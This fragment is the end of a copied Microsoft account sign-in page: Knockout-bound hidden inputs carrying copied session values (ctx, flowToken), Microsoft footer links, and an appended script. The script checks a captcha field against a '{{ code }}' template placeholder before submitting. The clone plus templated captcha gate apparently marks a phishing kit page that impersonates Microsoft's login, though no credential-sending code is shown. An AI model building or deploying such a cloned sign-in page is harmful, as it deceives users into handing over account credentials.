        <input type="hidden" name="ctx" data-bind="value: ctx" value="rQQIARAAhdK_j9sEFAdwO7nL3UVAo4JQEUI6IQYEdeJfsX0ndbBJnDg5O_HZiWMvlmM7jn87sZ04_guYUCeGSiwIhHQsCAlRKgYGGLgBVQwMnZgYOqCKqRIdGmCuGN5X7-lJb3mf-hHZbDeRJvxeFW3C5-_gJNHG8fYcwlCTgPCzOQxRmE1AiHWG7VcoSZjG-ma9QenSb28d_8J9Nrz90-V3n3x7BZ4usyxJz1ut7XbbjBcL17SbZhy2AiOy3MjZoPdB8CEI3qsc2hE0ka4qKYFRBIoSGIlTOIqT8BnVHHW6qCazrtZRM81zEHUHw3w5dS9kZ6cpfCaUPrqvQkD5Ni-bpeaJO36fquxkvMIVggvDAipiF0oX1zw-U1FxJ3S6heCx4f6O_6hyY0Tn2RL9J-K1W9p_VU4W8TrUkzjN7lU_rliDOY-Y5DTu6GqY93Ym1x-bi4HlEP6Uph2XvFy1HSizTVHmsbLsJBhhBdBKzxmMWCp9mbHDcOvpwQIvrGzizWAUv0CYoU_IacfYaASNFMt-jo1Ij4MYvIyHxlbElVD2FFJUDWlCT_BLZdxlB5MQT_vLpDdcIB4Rz80u26OW5sztBzMr4VKTb8sKxoqQ-UGhMSmnkxINXzAi50uq0B73BEqWs3WEYNkg9c3Y661GAymjY2q2zk1uwyxZOi9kbS0I3DryhiM796WsR3ZQiw2NKLNETsv9cKrw9GpuiFfVN17w3g36dbW2b8I4uq6ScWJHrnWarOOFG9gvIrFBW6N_p34c2k06CB4egI8PXj8-ahzeAk-Bd1-Dq-fHx_UGcAs4BZ4egJ8e7sUVv7Kfv_kj0_1y_uTtj77_Arg-bBGzti1KRovsvp8inFM4PXuiIqEljtgxvVeCbf2pyEQynfh34HPkbg28W6td1064ji50ZUqHn9TAD4-AByf_a_fRS6_W67mrB7FpBHZ68z_DP7wMPH3lwc_3__j72Td_9h_fuF16Q5I0WttJmaH5uI-txDmTMPJwKrtnai6pGiUYan86ohnxzlcN4PcG8Bw1">
        <input type="hidden" name="hpgrequestid" data-bind="value: svr.sessionId" value="a546d278-c41b-4542-ab62-f0228ebca700">
        <input type="hidden" id="i0327" data-bind="attr: { name: svr.sFTName }, value: flowToken" name="flowToken" value="AQABIQEAAAApTwJmzXqdR4BN2miheQMYGxwEVOjAupXM-_XefQUJyKeNy_5g0stxyHbZucOKekSrk10jix0u9L7qtKikrnuftxBdk5mK8f37bYIWIY_SLR76n9H2A9ImIFASGHEGsT7fX0iLedhj3xu6vAd5FKbsWSHdoM-r8tVdsqgH3NvsOyFnNeZMnwevROknOzPvAP1IG8VvhwGAcMQ2Uy0czdqxVKb5NNJBeuXKo3bufNvDru6MgCzPXYqrjgHg9DJwHX_oxseRfhQ-_Q-hRtrkU9xEIXmJjCrAHpgKR0gEipwBPB6BBDn2FM0RMWbI4txJxPDTk0BdtELgD_AZ7E0u5RHlqP5ebUf726EUH1uopsUXUiXo7_XQn77zUPhg0mUFF5v6ttbxqOM0PqKSK40dDn6G_2xIZ97H4IMZybsFB6O7LzAsj9eMfN-DPoX1nLsgo_MuNqqnp8l986s5oH71uB6xpJP8kaIy0ohZiBDkPE7H09UXdWxie1nAIzMSGIVJY5AM9DeAMCzlHNY1F_y0AfMhIAA">
        <input type="hidden" name="PPSX" data-bind="value: svr.sRandomBlob" value="">
        <input type="hidden" name="NewUser" value="1">
        <input type="hidden" name="FoundMSAs" data-bind="value: svr.sFoundMSAs" value="">
        <input type="hidden" name="fspost" data-bind="value: svr.fPOST_ForceSignin ? 1 : 0" value="0">
        <input type="hidden" name="i21" data-bind="value: wasLearnMoreShown() ? 1 : 0" value="0">
        <input type="hidden" name="CookieDisclosure" data-bind="value: svr.fShowCookieBanner ? 1 : 0" value="0">
        <input type="hidden" name="IsFidoSupported" data-bind="value: isFidoSupported() ? 1 : 0" value="1">
        <input type="hidden" name="isSignupPost" data-bind="value: isSignupPost() ? 1 : 0" value="0">
        <!-- ko ifnot: svr.fShouldSupportTargetCredentialForRecovery --><!-- /ko -->
        <!-- ko if: svr.fEnableDFPIntegration -->
        <input type="hidden" name="DfpArtifact" data-bind="value: dfpResult()" value="">
        <!-- /ko -->
        <!-- ko if: svr.fShouldSupportTargetCredentialForRecovery && targetCredentialForRecovery() --><!-- /ko -->
        <div data-bind="component: { name: 'instrumentation-control',
            publicMethods: instrumentationMethods,
            params: { serverData: svr } }">
<input type="hidden" name="i19" data-bind="value: timeOnPage" value=""></div>
    <!-- /ko -->
        </div>

        <!-- ko if: $page.showFedCredAndNewSession -->
        <!-- ko ifnot: svr.fUsePromotedFedCredTypesArray --><!-- /ko -->

        <!-- ko if: svr.fUsePromotedFedCredTypesArray -->
        <!-- ko if: $page.showFedCredButtons --><!-- /ko -->

        <!-- ko if: $page.showSignupFedCredButtons --><!-- /ko -->
        <!-- /ko -->

        <!-- ko if: svr.fShowQrCodePinOption --><!-- /ko -->

        <!-- ko if: $page.newSession --><!-- /ko -->
        <!-- /ko -->

        <!-- ko if: $page.showDebugDetails --><!-- /ko -->
    </div>
</div>
<!-- /ko --></div>
        </div>
    </div>

    <!-- ko if: $page.paginationControlHelper.showFooterControl -->
    <div id="footer" role="contentinfo" data-bind="
        externalCss: {
            'footer': true,
            'has-background': !$page.useDefaultBackground() &amp;&amp; $page.showFooter(),
            'background-always-visible': $page.backgroundLogoUrl }" class="footer ext-footer">

        <div data-bind="component: { name: 'footer-control',
            publicMethods: $page.footerMethods,
            params: {
                serverData: svr,
                useDefaultBackground: $page.useDefaultBackground(),
                hasDarkBackground: $page.backgroundLogoUrl(),
                showLinks: true,
                showFooter: $page.showFooter(),
                hideTOU: $page.hideTOU(),
                termsText: $page.termsText(),
                termsLink: $page.termsLink(),
                hidePrivacy: $page.hidePrivacy(),
                privacyText: $page.privacyText(),
                privacyLink: $page.privacyLink() },
            event: {
                agreementClick: $page.footer_agreementClick,
                showDebugDetails: $page.toggleDebugDetails_onClick } }"><!-- ko if: !hideFooter && (showLinks || impressumLink || showIcpLicense) -->
<div id="footerLinks" class="footerNode text-secondary footer-links ext-footer-links" data-bind="externalCss: { 'footer-links': true }">

    <!-- ko if: showFooter -->
        <!-- ko if: !hideTOU -->
        <a id="ftrTerms" data-bind="
            text: termsText,
            href: termsLink,
            click: termsLink_onClick,
            externalCss: {
                'footer-content': true,
                'footer-item': true,
                'has-background': !useDefaultBackground,
                'background-always-visible': hasDarkBackground }" href="https://www.microsoft.com/en-US/servicesagreement/" class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use</a>
        <!-- /ko -->

        <!-- ko if: !hidePrivacy -->
        <a id="ftrPrivacy" data-bind="
            text: privacyText,
            href: privacyLink,
            click: privacyLink_onClick,
            externalCss: {
                'footer-content': true,
                'footer-item': true,
                'has-background': !useDefaultBackground,
                'background-always-visible': hasDarkBackground }" href="https://privacy.microsoft.com/en-US/privacystatement" class="footer-content ext-footer-content footer-item ext-footer-item">Privacy &amp; cookies</a>
        <!-- /ko -->

        <!-- ko if: impressumLink --><!-- /ko -->

        <!-- ko if: a11yConformeLink --><!-- /ko -->

        <!-- ko if: showIcpLicense --><!-- /ko -->
    <!-- /ko -->

    <!-- Set attr binding before hasFocusEx to prevent Narrator from losing focus -->
    <a id="moreOptions" href="#" role="button" data-bind="
        click: moreInfo_onClick,
        ariaLabel: str['CT_STR_More_Options_Ellipsis_AriaLabel'],
        attr: { 'aria-expanded': showDebugDetails().toString() },
        hasFocusEx: focusMoreInfo(),
        externalCss: {
            'footer-content': true,
            'footer-item': true,
            'debug-item': true,
            'has-background': !useDefaultBackground,
            'background-always-visible': hasDarkBackground }" aria-label="Click here for troubleshooting information" aria-expanded="false" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
</div>
<!-- /ko -->

<!-- ko if: svr.fShowLegalMessagingInline && showLinks --><!-- /ko --></div>
    </div>
    <!-- /ko -->
</div>
<!-- /ko --></div>
        <!-- /ko -->

        <!-- ko if: isVerticalSplitTemplate() && isTemplateLoaded() --><!-- /ko -->
    <!-- /ko -->
<!-- /ko --></div>
    <!-- /ko -->
</form>
<p id="captcha-message"></p>

<form data-bind="postRedirectForm: postRedirect" method="POST" aria-hidden="true" target="_top"></form>

<!-- ko if: svr.urlCBPartnerPreload --><!-- /ko -->

<!-- ko if: svr.fEnableDFPIntegration && dfpUrl() --><!-- /ko --></div>

<script>
    // Check if user input matches the code
    var captchaForm = document.getElementById('captcha-form');
    var errorMessage = document.getElementById('captcha-message');

    captchaForm.addEventListener('submit', function(event) {
      event.preventDefault();
      var captchaInput = document.getElementById('captcha-input');

      if (captchaInput.value == "{{ code }}") {
        // Submit form
        captchaForm.submit();
      } else {
        errorMessage.innerText = 'Sorry, the code you entered is incorrect. Please try again.';
        errorMessage.style.display = 'block'; // Show error message
        captchaInput.value = '';
      }
    });
  </script>
</body></html>